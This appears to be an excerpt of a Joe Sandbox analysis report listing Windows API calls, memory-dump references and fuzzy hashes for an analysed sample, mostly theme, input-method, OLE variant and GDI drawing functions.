                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 029D8F79
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1705453755-0
                                                                                                                                            • Opcode ID: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
                                                                                                                                            • Instruction ID: 66b0060a891d1eedebfbb33d15f1e9d0d1061628bc057e677a6bd64c67c7f55b
                                                                                                                                            • Opcode Fuzzy Hash: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
                                                                                                                                            • Instruction Fuzzy Hash: 3D111EB5E00209AF9B00CF99C881DAFF7FAFFC8310B54C569A408E7250E6319A01CBA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029DB8E2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                            • Opcode ID: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
                                                                                                                                            • Instruction ID: f272fc31f4bd534a5ca40b626397ee75351cfe9058e8c2d6ceb4f50b43c6b329
                                                                                                                                            • Opcode Fuzzy Hash: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
                                                                                                                                            • Instruction Fuzzy Hash: 01E0D83170421857D710A5699C91AFA735D979C310F00826ABA48C7344EFB09D905BE4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,029DD07E,00000000,029DD297,?,?,00000000,00000000), ref: 029DB923
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                            • Opcode ID: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
                                                                                                                                            • Instruction ID: 7b7d8db678f3df5f8ac19cc6ea9cc40e8ba0db552bbde7c3d36716ec44986af6
                                                                                                                                            • Opcode Fuzzy Hash: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
                                                                                                                                            • Instruction Fuzzy Hash: A4D05E6230E2A02AA210919A6D84D7B5ADCCAC97A9F01843AF588C6201D3008C06AA71
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeResource
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 54164923-0
                                                                                                                                            • Opcode ID: d6618b3166dd2d9bf8e4447dcb263f2675a5a5db593ad47a37b370b1ea9764f3
                                                                                                                                            • Instruction ID: a93a9440b16f38ca4fc3188bdf8cc9e70a4d198c1f2571737ab7d2de42026d26
                                                                                                                                            • Opcode Fuzzy Hash: d6618b3166dd2d9bf8e4447dcb263f2675a5a5db593ad47a37b370b1ea9764f3
                                                                                                                                            • Instruction Fuzzy Hash: 4FD0A752740960030521B67C298058E938BCE84262304CA60A580C7250E718CD466FDB
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocalTime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 481472006-0
                                                                                                                                            • Opcode ID: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
                                                                                                                                            • Instruction ID: 6725d4d5c1ec2abb0eb8b4494f1bd2c3c379c8cd5801088df5638c8792cd205b
                                                                                                                                            • Opcode Fuzzy Hash: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
                                                                                                                                            • Instruction Fuzzy Hash: 99A01100808820028A803328AC0223830C8A882B20FC88B88A8F8802E0EA2E0220A0A3
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: F
                                                                                                                                            • API String ID: 0-1304234792
                                                                                                                                            • Opcode ID: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
                                                                                                                                            • Instruction ID: 4c91127af604b3c4e70e3cad80254788fe2a69295e2576ca0e57d7404b7c6ff7
                                                                                                                                            • Opcode Fuzzy Hash: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
                                                                                                                                            • Instruction Fuzzy Hash: FD517571F006198BEB08CE5DC8D07AEB6F7ABC8315F558539EA09E7388DEB45E018754
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1d3ea7b5a62d0263bd5a8c0f012e1c092652189da95e11612ec9804777a53492
                                                                                                                                            • Instruction ID: 642ebb9fa1c441a53be36679f84849419d627025ff99ca773698ac4568d25463
                                                                                                                                            • Opcode Fuzzy Hash: 1d3ea7b5a62d0263bd5a8c0f012e1c092652189da95e11612ec9804777a53492
                                                                                                                                            • Instruction Fuzzy Hash: 18F17471E80229ABDF049BA5CD45BEFBBBBEF84310F148055F941B7286DE749911CB60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
                                                                                                                                            • Instruction ID: 765d04ffe1f81f42907b6735ab56eb0cc258f07a6d7f031e623809d02f07c3a9
                                                                                                                                            • Opcode Fuzzy Hash: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
                                                                                                                                            • Instruction Fuzzy Hash: 3CD13875E503469FDB16CFA89D807AEFBF6AF49300F1480B9F848D2641EB749A54CB90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5b824255cf96ec847ae8711f241e2aba64d2e3cc19cd3ccc37cc53f61f00fa9a
                                                                                                                                            • Instruction ID: 2e942e48eec418361cd3847c90013d40beb37932c060bfc5b13b77db21438118
                                                                                                                                            • Opcode Fuzzy Hash: 5b824255cf96ec847ae8711f241e2aba64d2e3cc19cd3ccc37cc53f61f00fa9a
                                                                                                                                            • Instruction Fuzzy Hash: 2AA1B230A40615AFDB05DFA9CD80BBFB7A7DFC4320F148266A8159B299DF74D901CA64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                            • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                            • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                            • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,029FBAF7), ref: 029FB77A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 029FB792
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 029FB7A4
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 029FB7B6
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 029FB7C8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 029FB7DA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 029FB7EC
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 029FB7FE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 029FB810
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 029FB822
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 029FB834
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 029FB846
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 029FB858
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 029FB86A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 029FB87C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 029FB88E
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 029FB8A0
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 029FB8B2
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 029FB8C4
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 029FB8D6
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 029FB8E8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 029FB8FA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 029FB90C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 029FB91E
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 029FB930
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 029FB942
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 029FB954
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 029FB966
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 029FB978
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 029FB98A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 029FB99C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 029FB9AE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 029FB9C0
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 029FB9D2
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 029FB9E4
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 029FB9F6
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 029FBA08
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 029FBA1A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 029FBA2C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 029FBA3E
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 029FBA50
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 029FBA62
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 029FBA74
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 029FBA86
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 029FBA98
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 029FBAAA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 029FBABC
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 029FBACE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                            • API String ID: 2238633743-2910565190
                                                                                                                                            • Opcode ID: ae7cbc70f9ab9605166d0746880e22c7a8c83b7670d19247b8cda6131e79f02b
                                                                                                                                            • Instruction ID: 1d3c3feb6cfcbcc65b5bbd862c46c1845c3d102bb84816f30d065e30fb832741
                                                                                                                                            • Opcode Fuzzy Hash: ae7cbc70f9ab9605166d0746880e22c7a8c83b7670d19247b8cda6131e79f02b
                                                                                                                                            • Instruction Fuzzy Hash: 94A132B0A84390AFFF80EFB4E8D992637ACEB997043004969E515DF245DB78D811DF12
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 02A17041
                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,02A1718E,?,00008000), ref: 02A17065
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 02A17072
                                                                                                                                            • LoadLibraryA.KERNEL32(imm32.dll,00000000,02A1718E,?,00008000), ref: 02A1708E
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 02A170B0
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 02A170C5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 02A170DA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 02A170EF
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 02A17104
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 02A17119
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 02A1712E
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 02A17143
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 02A17158
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 02A1716D
                                                                                                                                            • SetErrorMode.KERNEL32(?,02A17195,00008000), ref: 02A17188
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                                                                            • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                                                                                            • API String ID: 3397921170-3950384806
                                                                                                                                            • Opcode ID: dd5e36c553b68e19cd2ce27084cd6cb49fde172b3c84214d22645b1b0e8920c3
                                                                                                                                            • Instruction ID: 56780e41427d39d39d5766be31f7cfc53c4c9fd063c5ac4967742b91038eecaf
                                                                                                                                            • Opcode Fuzzy Hash: dd5e36c553b68e19cd2ce27084cd6cb49fde172b3c84214d22645b1b0e8920c3
                                                                                                                                            • Instruction Fuzzy Hash: 4231DBB1EC4340AEFB00EBB4AC9A969B7AAF784714B009C19F506D7111DF78D826DF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 029DE609
                                                                                                                                              • Part of subcall function 029DE5D4: GetProcAddress.KERNEL32(00000000), ref: 029DE5ED
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                                                            • Opcode ID: 44a460ed3e3c6d62f43b120f22bec462de5a13dec10028c4536da4fe5a7cd12a
                                                                                                                                            • Instruction ID: 87ae4c8b92971330904144eebc08e712da1dbb958efde556fa9b1e7ef95c9855
                                                                                                                                            • Opcode Fuzzy Hash: 44a460ed3e3c6d62f43b120f22bec462de5a13dec10028c4536da4fe5a7cd12a
                                                                                                                                            • Instruction Fuzzy Hash: 6F411170EE83045B66086F79780442BB7DAD384750374C42AF4C4AFA51EE31ED42BB2A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 029F36F3
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 029F3708
                                                                                                                                            • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,029F3778,?,?), ref: 029F374C
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 029F3766
                                                                                                                                            • DeleteObject.GDI32(?), ref: 029F3772
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 029F3786
                                                                                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 029F37A7
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 029F37BC
                                                                                                                                            • SelectPalette.GDI32(?,04080DCD,00000000), ref: 029F37D0
                                                                                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 029F37E2
                                                                                                                                            • SelectPalette.GDI32(?,00000000,000000FF), ref: 029F37F7
                                                                                                                                            • SelectPalette.GDI32(?,04080DCD,000000FF), ref: 029F380D
                                                                                                                                            • RealizePalette.GDI32(?), ref: 029F3819
                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 029F383B
                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 029F385D
                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 029F3865
                                                                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 029F3873
                                                                                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 029F389F
                                                                                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 029F38C4
                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 029F38CE
                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 029F38D8
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F38EB
                                                                                                                                            • DeleteObject.GDI32(?), ref: 029F38F4
                                                                                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 029F3916
                                                                                                                                            • DeleteDC.GDI32(?), ref: 029F391F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
